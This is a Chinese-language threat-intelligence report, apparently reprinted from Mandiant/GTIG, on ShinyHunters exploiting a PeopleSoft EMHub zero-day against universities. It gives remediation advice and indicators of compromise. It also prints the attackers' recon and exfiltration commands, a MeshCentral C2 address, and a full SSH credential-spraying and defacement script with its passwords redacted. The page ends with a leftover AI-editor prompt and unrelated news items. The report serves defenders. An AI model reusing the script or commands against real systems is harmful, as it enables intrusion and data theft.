近期知名黑客组织ShinyHunters利用Oracle PeopleSoft漏洞攻击多家教育机构
介绍 Mandiant和Google Threat Intelligence Group (GTIG)近期发现了一起由UNC6240(ShinyHunters)发起的针对Oracle PeopleSoft应用基础设施的入侵和勒索活动。该活动在2026年5月27日至6月9日期间被观测到,其技术特征与C
介绍
Mandiant和Google Threat Intelligence Group (GTIG)近期发现了一起由UNC6240(ShinyHunters)发起的针对Oracle PeopleSoft应用基础设施的入侵和勒索活动。该活动在2026年5月27日至6月9日期间被观测到,其技术特征与CVE-2026-35273的利用高度吻合——这是一个存在于Environment Management组件中的严重远程代码执行漏洞,CVSS评分高达9.8。而攻击者们瞄准的,正是Environment Management Hub (PSEMHUB) 的端点——这个漏洞的利用方式与攻击目标完美对应。由于这一系列攻击行为发生在Oracle于2026年6月10日发布安全公告之前,该漏洞实际上是以零日漏洞的形态被利用的。
在发现活跃的扫描和利用行为后,我们立即启动了通知机制,向超过100家全球组织发送了预警,这些组织的IP地址与可能存在漏洞的端点相关联。这些组织大多位于美国,其中68%属于高等教育机构。随后,安全研究员@nahamike01在X平台上发布的公开报告揭示了攻击者在临时服务器上留下的开放目录,这使得GTIG能够对攻击者的行动进行详细的分诊分析。
攻击者搭建的临时环境中托管了经定制的MeshCentral袋里程序,这些程序伪装成合法的云端点,用于执行管理命令查询,并部署自定义的横向移动和篡改脚本[victim_abbreviation]_fanout.sh。这一系列活动与随后在2026年6月9日于ShinyHunters数据泄露站点(DLS)上发布的被窃数据直接关联。
建议运行Oracle PeopleSoft的组织立即采取以下措施以进行最佳防御。本文后续部分将提供更为详细的修复和加固指南。
修复与加固快速指南
- 在多服务器配置中,按照Oracle安全警报指南的建议禁用Environment Management Hub (EMHub)服务;在单服务器配置中,彻底移除
PSEMHUB应用。 - 如果无法禁用EMHub服务,需要在网络边界或防火墙层面阻止对
/PSEMHUB/*和/PSIGW/HttpListeningConnector的外部访问。 - 检查PIA WebLogic访问日志,寻找源自外部IP的
POST /PSEMHUB/hub和POST /PSIGW/HttpListeningConnector请求。 - 检查Web层文件系统上的入侵迹象,特别是
/webserv//applications/peoplesoft/PSEMHUB.war/目录下是否存在非产品自带的任何.jsp文件。 - 检查文件系统在
/PSEMHUB.war/envmetadata/transactions/下是否存在任何文件或目录,以及PSEMHUB相关路径下是否存在名为logs、persistantstorage或scratchpad的意外目录。 - 监控PeopleSoft服务器发往不可信外部目标的出站SMB流量(通过出站防火墙日志和NetFlow数据)。
威胁详情与活动概述
2026年6月9日,公开的威胁报告揭示了攻击者留下的开放目录。GTIG对五个连续的IP地址进行了分诊分析:142.11.200.186、142.11.200.187、142.11.200.188、142.11.200.189和142.11.200.190。这些系统托管着运行在8888端口的Python SimpleHTTP服务器,暴露的目录内容包含了准备材料、定制袋里程序以及攻击者的命令历史记录。
这些临时基础设施中托管了预配置的Windows MeshCentral袋里程序二进制文件,这些文件被伪装成微软Azure服务,具体命名包括meshagent32-azure-ops.exe、meshagent64-azure-ops.exe和meshagent64-v2.exe。MeshCentral是一个开源的远程管理服务器;其袋里程序是运行在远程设备上的软件,允许对各种操作系统(包括Windows、Linux、macOS和FreeBSD)进行远程管理。静态分析显示,这些袋里程序被硬编码为与命令与控制(C2)服务器wss://azurenetfiles.net:443/agent.ashx建立通信。域名azurenetfiles.net被特意选择来模仿合法的微软Azure NetApp Files端点,这是一种常见的伪装手法。此外,临时环境中还存放着一个未配置的Linux meshagent二进制文件,这表明攻击者在部署时是通过命令行动态传递参数的。
全球通知响应行动
在发现开放临时目录之前,我们就已开始向超过100家暴露在外的组织发送预警,协助它们限制对易受攻击端点的访问。这些组织高度集中在高等教育领域,其中68%是学术机构,包括全球各地的大学和学院。
尽管部分组织成功阻止了攻击活动或修复了漏洞,但仍有其他组织遭受入侵,导致被窃数据在ShinyHunters的DLS上被公开。
技术分析与命令历史
攻击者的.bash_history文件(五个临时主机上内容一致)完整记录了服务器配置和操作过程。技术叙述从临时环境的配置开始:2026年5月27日22:14 UTC,攻击者安装了MeshCentral远程管理服务器(版本1.1.59)以建立其C2临时环境。紧接着,在22:25 UTC,他们安装了acme-client npm包,用于自动化配置模仿域名azurenetfiles.net的Let's Encrypt SSL证书。攻击者通过MeshCentral命令行接口工具meshctrl.js与被入侵系统进行交互。
命令历史显示,攻击者在被入侵的内部网络中进行了有针对性的侦察。他们通过检查挂载点、检查进程调度器配置文件psappsrv.cfg以及读取WebLogic服务器XML配置(config.xml)来映射Oracle PeopleSoft 配置。会话日志以攻击者从其临时系统建立到176.120.22.24的出站SSH连接告终,该IP地址托管着ShinyHunters DLS的公开暗网镜像。
对暴露的命令历史进行分析,揭示了攻击者在临时服务器上执行的关键管理和恶意操作(并非所有情况都附有时间戳):
1. 临时基础设施搭建:
2026年5月27日 22:14 UTC: 安装MeshCentral(v1.1.59)及22:25 UTC: 安装“acme-client”,以建立C2临时环境并自动化配置
azurenetfiles.net的SSL证书。准备完成编译的Windows袋里程序二进制文件(
meshagent32-azure-ops.exe等),这些程序被设计为回连到C2地址:wss://azurenetfiles.net:443/agent.ashx。2026年5月29日 18:46 UTC: 攻击者使用命令
npm list global authenticode检查临时系统上“authenticode”工具的可用性。此命令将返回所有以“authenticode”开头的npm包,例如用于签名的authenticode-sign,或用于检查文件元数据的authenticode。
2. 定向内部侦察:
利用MeshCentral命令行工具meshctrl.js在被入侵的远程端点上执行管理命令查询:hostname; id。
通过检查进程调度器配置文件(
psappsrv.cfg)来映射Oracle PeopleSoft系统配置,提取机器名和IP地址:
grep -hE '''^[[:space:]]*Address=|^[[:space:]]*HostName=''' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80
审计被入侵主机上的网络配置和活跃挂载点:
mount | grep -E "psoft|ps_config|nfs"。通过查询本地主机表来映射内部子网主机:
cat /etc/hosts | grep -E "[redacted_victim_string]"。检查WebLogic XML配置(
config.xml)以映射内部应用服务器。
3. 横向移动与脚本传播:
通过heredoc方式在临时主机的
/tmp目录中编写了横向传播脚本[victim_abbreviation]_fanout.sh。利用MeshCentral的命令执行功能在被入侵主机上触发传播脚本的执行:
node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh'
通过远程检查篡改标记文件
README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT的存在来验证传播是否成功。
4. 数据外泄与DLS连接:
使用
zstd压缩包含被窃数据的外泄目录:
pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst
- 以从临时主机向
176.120.22.24(托管着ShinyHunters数据泄露站点公开镜像的IP地址)建立出站SSH连接结束了整个操作流程。
图1:ShinyHunters DLS上显示的PeopleSoft受害者信息,发布日期为2026年6月9日
传播脚本与横向移动
正如.bash_history日志中所观察到的,攻击者将一个名为[victim_abbreviation]_fanout.sh的传播脚本直接写入被入侵系统的/tmp目录。该脚本通过解析本地/etc/hosts文件中符合特定命名模式的主机名,自动对内部主机进行SSH凭据喷洒攻击。脚本尝试使用硬编码的常见管理及应用专用用户名和密码列表进行身份验证。
在成功建立SSH会话后,脚本会将一个名为README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT的篡改和勒索标记文件复制到WebLogic和进程调度器目录中。此部署活动的时机与2026年6月9日在ShinyHunters DLS上发布被窃数据的时间点完全吻合。
以下为传播脚本[victim_abbreviation]_fanout.sh经脱敏处理后的内容:
set +eSRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"BASE="/u01/app/psoft/ps_config_homes/csprd"export PATH=/usr/bin:/bin# hosts from /etc/hosts — internal PS nodes onlyHOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)echo "HOSTS=$(echo $HOSTS | wc -w)"PWDS="[redacted_passwords]"USERS="[redacted_usernames]"OK=0; FAIL=0; SKIP=0for h in $HOSTS; doecho "=== $h ==="copied=0for u in $USERS; dofor p in $PWDS; dosshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=no $u@$h "hostname" >/dev/null 2>&1 && {for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; dosshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && echo "OK $dest ($u)" && OK=$((OK+1)) && copied=1donebreak 2}donedoneif [ $copied -eq 0 ]; then# try key-basedssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=yes $USER@$h "hostname" >/dev/null 2>&1 && copied=1 || trueif [ $copied -eq 0 ]; then echo "FAIL ssh"; FAIL=$((FAIL+1)); fifidone# local paths on this hostfor dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; doif [ -d "$dest" ]; then cp -f "$SRC" "$dest/$NAME" && chmod 644 "$dest/$NAME" && echo "LOCAL OK $dest"; fidoneecho SUMMARY ok=$OK fail=$FAILfind $BASE -name "$NAME" -type f 2>/dev/null
修复与加固
为了防御此类攻击活动,建议运行Oracle PeopleSoft的组织立即实施以下安全措施:
网络隔离与WAF规则
端点访问限制: 如果无法禁用EMHub服务,需立即在网络边界或防火墙层面阻止对敏感端点
/PSEMHUB/*(特别是/PSEMHUB/hub)和/PSIGW/HttpListeningConnector的外部网络访问。仅依赖Web应用防火墙(WAF)的正文检查规则是不够的,因为这些控制措施可能被绕过。非破坏性操作: 限制这些端点对于标准终端用户操作而言属于非破坏性操作。Environment Management Hub (EMHub)和Integration Broker监听连接器属于管理或系统间组件,并非核心面向用户的PeopleSoft Internet Architecture (PIA)浏览器会话所必需。
日志与端点监控
访问日志分析: 审计PIA WebLogic访问日志,查找源自外部或不可信IP地址的、针对
/PSEMHUB/hub和/PSIGW/HttpListeningConnector的HTTPPOST请求。SSRF检测: 分析对
/PSIGW/HttpListeningConnector的请求,检查请求头或参数中是否包含回环IP地址(如127.0.0.1、localhost或::1)或内部IP范围。这是攻击者执行服务器端请求伪造(SSRF)以绕过访问控制的常见方法。
网络遥测
出站端口445监控: 监控PeopleSoft主机发往不可信外部互联网目标的出站SMB流量(TCP端口445)的防火墙日志和NetFlow数据。攻击链可能会诱使系统建立出站连接,试图捕获Windows机器账户NetNTLM哈希值。
主机级审计与文件系统检查
对PeopleSoft主机上的Web层文件系统进行彻底的取证审计,寻找入侵指标:
Webshell检测: 扫描WebLogic Web应用目录
,查找任何非产品自带的意外/webserv/ /applications/peoplesoft/PSEMHUB.war/ *.jsp文件。未授权准备: 检查目录
.../PSEMHUB.war/envmetadata/transactions/,查找未经授权的文件夹、文件或二进制文件投放。意外目录: 在PSEMHUB目录下查找名为
logs、persistantstorage或scratchpad的意外目录。XMLDecoder持久化: 检查
目录下近期创建或修改的/envmetadata/data/environment/ .xml文件,这些文件可能被攻击者利用,在应用重启时通过XMLDecoder执行远程代码。
遵循Oracle安全公告的建议,我们认为实施这些缓解措施是降低风险的高优先级工作,并强烈建议立即采取行动以解决已识别的暴露问题。鉴于该漏洞无需身份验证即可远程利用,并可能导致远程代码执行,组织必须保持在受支持的版本上,并及时应用所有关键补丁更新、关键安全补丁更新和安全警报。请查阅完整的 Oracle安全警报公告 - CVE-2026-35273以获取详细信息。
入侵指标(IOCs)
为帮助更广泛的安全社区进行威胁狩猎和识别本报告中所述的活动,我们已经整理了一份入侵指标(IOCs)清单,供注册用户在GTI集合中查阅。
临时与C2网络指标
142.11.200.186142.11.200.187142.11.200.188142.11.200.189142.11.200.190azurenetfiles.net
临时载荷与攻击者文件
文件路径/名称 |
指标类型 |
描述 |
值/哈希(SHA-256) |
|---|---|---|---|
|
文件哈希 |
攻击者命令历史 |
|
|
文件哈希 |
预配置的Windows袋里 |
|
|
文件哈希 |
预配置的Windows袋里 |
|
|
文件哈希 |
预配置的Windows袋里 |
|
|
文件哈希 |
未配置的Linux袋里 |
|
|
文件名 |
篡改/勒索标记 |
N/A |
|
文件名 |
传播脚本 |
N/A |
你是一名 AI 行业编辑,请围绕下面这条热点输出一份资讯解读:
热点:近期知名黑客组织ShinyHunters利用Oracle PeopleSoft漏洞攻击多家教育机构要求:
1. 先用一句话解释这条热点在讲什么
2. 再总结它为什么重要
3. 说明会影响哪些 AI 产品或内容方向
4. 最后给出 3 个适合资讯站使用的标题
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
相关热点面壁智能聚焦端侧AI,不拼参数大小,而是通过知识密度提升与模型风洞技术,将大模型压缩至手机、汽车等设备。其MiniCPM以2B参数超越同期8B对手。CTO曾国洋22岁主导训练中国首个大语言模型CPM-1。端侧AI追求“默契系统”,在用户开口前预判需求,已在吉利、上汽大众等车型落地应用。
印度IT巨头HCLTech投资最高350亿卢比建设AI数据中心,容量可扩展至50MW,提供从设计到运营的端到端服务,旨在满足政府及企业日益增长的算力需求,抢占印度快速增长的数据中心市场,并推动AI基础设施布局。
小米具身机器人在汽车工厂自攻螺母上件工站实现双侧作业成功率98%,接近人工水平。同时在新工站分别达到90%成功率,从单一操作拓展至多工站协同,验证了具身智能在复杂工业环境的落地能力。
全球AI行业正迎来新的财富格局,DeepSeek创始人梁文锋凭借其公司的迅猛发展,个人财富急剧膨胀,一举超越多位硅谷知名人物,成为全球AI公司领域的新首富。以下将详细解析其身价飙升背后的关键因素及公司发展历程。 一、身价飙升至360亿美元,超越多位AI大佬 根据最新彭博亿万富豪指数,DeepSeek
- 日榜
- 周榜
- 月榜
热点快看
